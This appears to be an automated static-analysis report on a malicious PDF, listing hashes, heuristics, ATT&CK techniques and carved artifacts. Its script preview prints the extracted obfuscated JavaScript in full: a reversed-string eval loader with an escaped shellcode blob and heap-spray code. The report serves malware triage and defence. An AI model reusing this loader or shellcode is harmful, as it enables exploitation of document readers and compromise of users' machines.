Malicious PDF — malware analysis report

Static analysis result for SHA-256 eb0e13f1f4f47ee8…

MALICIOUS

PDF

69.2 KB First seen: 2026-05-09
MD5: e7b30ae9ba3beed9099a98fd12d32c99 SHA-1: aa2684a44ca0746a9a985ef1446d8c2e34befa36 SHA-256: eb0e13f1f4f47ee8210f468be3ba66e68fd06326f93eed85071b67c7559d3a84
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.002 Spearphishing Attachment

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. An embedded JavaScript file, 'javascript_obj0012_000.js', was extracted. The presence of these elements suggests the document is designed to execute malicious code, likely for downloading a secondary payload. The embedded URL 'http://www.bitstream.com' is also noted.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3686 bytes
SHA-256: d3541f8e2467ff8bbaf9e5a0fe8f7c314e4018f3c389a54a2c5f12f6ef690c6a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) ipmet (epak = olygak rav ;epacsenu = epak rav } }	   ]j[lp =+ ipmet  		 esle  	   ;"%" =+ ipmet    	 )"Q" == ]j[lp( fi  	 {   )"P" =! ]j[lp( fi   { )++j;htgnel.lp<j;0=j( rof ;"" = ipmet rav 		;"b014uQc6e7uQ2ffauQ4c4duQb180uQ6543uQ8754uQ65d1uQ676duQ5c86uQa9a9uQ87eauQeef9uQa7eauQbdfduQ24d2uQceb9uQe1a8uQ4768uQ673cuQ5deauQ9798uQef9cuQef47uQ5760uQ5954uQa642uQ5953uQfc95uQ247buQd833uQ61d8uQ5c19uQ9a82uQ5953uQ6c71uQc8f4uQc167uQ8020uQ6415uQ7c38uQdceauQba77uQac97uQ3e35uQd7deuQ06f5uQ8ab6uQ38e5uQad8cuQe14fuQcfd3uQ5c58uQ14a3uQda67uQe9f4uQ960buQ31d0uQ65f7uQb2e5uQ59c4uQ9ff0uQddd4uQc44buQ0e20uQ897auQ033fuQ398fuQ67bcuQa336uQ47b9uQd49cuQ1fb5uQdeeauQd1ccuQd2f8uQ8688uQe7e1uQfb3cuQd8a4uQ67d9uQ87b0uQ6425uQb2bauQab80uQ7e9auQ2724uQ6d70uQ30b6uQd58auQb844uQ5c4cuQ5ccauQ52f2uQd88fuQ47f9uQ6db6uQ54d8uQf5e8uQ4baeuQc9e6uQa536uQ30c6uQ3c40uQ7138uQ13b7uQ1896uQ7194uQb5fbuQ1b33uQ424fuQ9d47uQ929cuQbddduQ0070uQf211uQ0070uQ137duQ0070uQd451uQff09uQffffuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQff09uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQffffuQ8e6euQ0070uQbb51uQ0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPbPeP5P0PuPQP5P7PePePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP1P8PbPfPuPQP2PcP4P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P0P3P8PuPQP3P8P0PcPuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP9P8P8P1PuPQPbP8PaP1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP5P1P8P5PuPQPaP5PbPePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P5P0P9PuPQPaP5P0P9PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP1P3P7PdPuPQP0P0P0P0PuPQP0P4P0P0PuPQP0P0P0P0PuPQP0P0P0P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P0P0PuPQP0P0P0P0PuPQP1P0P0P0PuPQP0P0P1P0PuPQPfPfPfPfPuPQPfPfPfPfPuPQP0P0P7P0PuPQP4P5PcP5PuPQP0P0P7P0PuPQP2PeP2P5PuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP0P0P1P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2PbPfP7PuPQPePfPfP7PuPQP0P0P3P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPdP4P5P1PuPQP0P0P0P0PuPQP0P0P0P1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP1P0P0P0PuPQP4P2P1P0PuPQP0P0P7P0PuPQP9P9P5P1PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP3P3P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQPfP6P5P1PuPQP0P0P7P0PuPQPfPeP8P4PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQP9P1P9P4PuPQPcP0PcP0PuPQPcP0PcP0PuPQP" = lp rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.